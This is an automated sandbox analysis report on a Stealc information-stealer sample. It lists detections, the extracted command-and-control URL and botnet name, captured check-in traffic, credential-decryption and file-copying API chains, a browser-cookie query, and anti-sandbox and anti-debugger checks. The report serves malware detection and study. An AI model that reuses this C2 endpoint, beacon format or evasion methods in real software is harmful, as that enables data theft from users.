Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1529037
MD5:9d007dc0dc48fd402f13f65547d002f3
SHA1:487a3e42ebc95babcc96a71388fd35577290302d
SHA256:6bc02402cb6ca77ef60e9e04ed1996840e9eb6088a0b9f748653d63f915edb0a
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 1824 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 9D007DC0DC48FD402F13F65547D002F3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.2111080022.0000000004B20000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2156506568.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 1824JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 1824JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.160000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-08T15:42:15.749488+020020442431Malware Command and Control Activity Detected192.168.2.649710185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.160000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Multi AV Scanner detection for submitted file
                Source: file.exeReversingLabs: Detection: 47%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0016C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0016C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00167240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00167240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00169AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00169AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00169B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00169B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00178EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00178EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001738B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_001738B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00174910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00174910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0016DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0016DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0016E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0016E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0016ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0016ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00174570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00174570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0016DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0016DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0016BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0016BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0016F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0016F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00173EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00173EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001616D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001616D0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49710 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHCBAAAFHJDHJJKEBGHIHost: 185.215.113.37Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 43 42 41 41 41 46 48 4a 44 48 4a 4a 4b 45 42 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 42 37 33 43 39 31 30 35 45 35 46 35 35 32 38 31 35 38 36 33 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 42 41 41 41 46 48 4a 44 48 4a 4a 4b 45 42 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 42 41 41 41 46 48 4a 44 48 4a 4a 4b 45 42 47 48 49 2d 2d 0d 0a Data Ascii: ------EHCBAAAFHJDHJJKEBGHIContent-Disposition: form-data; name="hwid"FB73C9105E5F552815863------EHCBAAAFHJDHJJKEBGHIContent-Disposition: form-data; name="build"doma------EHCBAAAFHJDHJJKEBGHI--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00164880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00164880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHCBAAAFHJDHJJKEBGHIHost: 185.215.113.37Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 43 42 41 41 41 46 48 4a 44 48 4a 4a 4b 45 42 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 42 37 33 43 39 31 30 35 45 35 46 35 35 32 38 31 35 38 36 33 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 42 41 41 41 46 48 4a 44 48 4a 4a 4b 45 42 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 42 41 41 41 46 48 4a 44 48 4a 4a 4b 45 42 47 48 49 2d 2d 0d 0a Data Ascii: ------EHCBAAAFHJDHJJKEBGHIContent-Disposition: form-data; name="hwid"FB73C9105E5F552815863------EHCBAAAFHJDHJJKEBGHIContent-Disposition: form-data; name="build"doma------EHCBAAAFHJDHJJKEBGHI--
                Source: file.exe, 00000000.00000002.2156506568.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2156506568.0000000000D07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.2156506568.0000000000D07000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2156506568.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2156506568.0000000000D07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php%hh
                Source: file.exe, 00000000.00000002.2156506568.0000000000D07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php=h
                Source: file.exe, 00000000.00000002.2156506568.0000000000D07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpft
                Source: file.exe, 00000000.00000002.2156506568.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37RD

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005238B20_2_005238B2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006179610_2_00617961
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053297F0_2_0053297F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052532C0_2_0052532C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0047F4580_2_0047F458
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052F4340_2_0052F434
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005014860_2_00501486
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004415CB0_2_004415CB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004005E00_2_004005E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00521D960_2_00521D96
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053459E0_2_0053459E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00530E130_2_00530E13
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00526E280_2_00526E28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050973D0_2_0050973D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052CFE60_2_0052CFE6
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 001645C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: iovqbmaf ZLIB complexity 0.9948017834018891
                Source: file.exe, 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2111080022.0000000004B20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00179600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00179600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00173720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00173720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\56T9UQQV.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exe, 00000000.00000002.2156506568.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies;!q
                Source: file.exeReversingLabs: Detection: 47%
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1836544 > 1048576
                Source: file.exeStatic PE information: Raw size of iovqbmaf is bigger than: 0x100000 < 0x19a400

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.160000.0.unpack :EW;.rsrc :W;.idata :W; :EW;iovqbmaf:EW;tgzswadw:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;iovqbmaf:EW;tgzswadw:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00179860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00179860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1cf542 should be: 0x1cf5ed
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: iovqbmaf
                Source: file.exeStatic PE information: section name: tgzswadw
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F704C push eax; mov dword ptr [esp], ebx0_2_005F70BD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0017B035 push ecx; ret 0_2_0017B048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0058406C push edx; mov dword ptr [esp], 3B54967Bh0_2_005841EB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D7869 push esi; mov dword ptr [esp], 47AC6C17h0_2_005D78DA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D7869 push edi; mov dword ptr [esp], edx0_2_005D78E6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F6044 push ebp; mov dword ptr [esp], eax0_2_007F605E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F6044 push 07EE2D2Eh; mov dword ptr [esp], ebx0_2_007F6077
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F6044 push ecx; mov dword ptr [esp], 5BCCEF3Eh0_2_007F60ED
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F6044 push ecx; mov dword ptr [esp], eax0_2_007F614D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0058F01B push eax; mov dword ptr [esp], 59EF7000h0_2_0058F05F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0058F01B push 6068EFD7h; mov dword ptr [esp], eax0_2_0058F368
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00603023 push 40938B43h; mov dword ptr [esp], esi0_2_0060303E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0055B012 push 77452862h; mov dword ptr [esp], ecx0_2_0055B057
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0055B012 push eax; mov dword ptr [esp], edi0_2_0055B104
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056781C push eax; mov dword ptr [esp], edx0_2_00567882
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0051900A push 7A12DBE4h; mov dword ptr [esp], ebp0_2_0051903E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0051900A push ecx; mov dword ptr [esp], ebx0_2_00519054
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053F03B push ebp; mov dword ptr [esp], 0515A3E0h0_2_0053F045
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F6016 push ebp; mov dword ptr [esp], eax0_2_007F605E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F6016 push 07EE2D2Eh; mov dword ptr [esp], ebx0_2_007F6077
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F6016 push ecx; mov dword ptr [esp], 5BCCEF3Eh0_2_007F60ED
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F6016 push ecx; mov dword ptr [esp], eax0_2_007F614D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005680D7 push ebx; mov dword ptr [esp], 7CFF106Eh0_2_005680DD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006010D1 push edx; mov dword ptr [esp], eax0_2_006010F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005950E5 push 5B80A24Ah; mov dword ptr [esp], ebp0_2_00595118
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005950E5 push 2A7D1703h; mov dword ptr [esp], ecx0_2_0059516E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005898E6 push ebp; mov dword ptr [esp], ecx0_2_0058995F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CE091 push 7AC0143Dh; mov dword ptr [esp], edx0_2_005CE0B6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CE091 push 0201C094h; mov dword ptr [esp], edi0_2_005CE0DC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005238B2 push edx; mov dword ptr [esp], edi0_2_00523901
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005238B2 push 2E358536h; mov dword ptr [esp], eax0_2_0052391E
                Source: file.exeStatic PE information: section name: iovqbmaf entropy: 7.9538207256362705

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00179860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00179860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13601
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53918C second address: 53919C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F3F244F40E2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53919C second address: 5391A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5391A2 second address: 5391A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5391A6 second address: 5391AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5391AB second address: 5391B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 526994 second address: 52699A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5382B9 second address: 5382BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538840 second address: 538846 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5389EE second address: 5389F9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5389F9 second address: 5389FF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5389FF second address: 538A1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F3F244F40E2h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
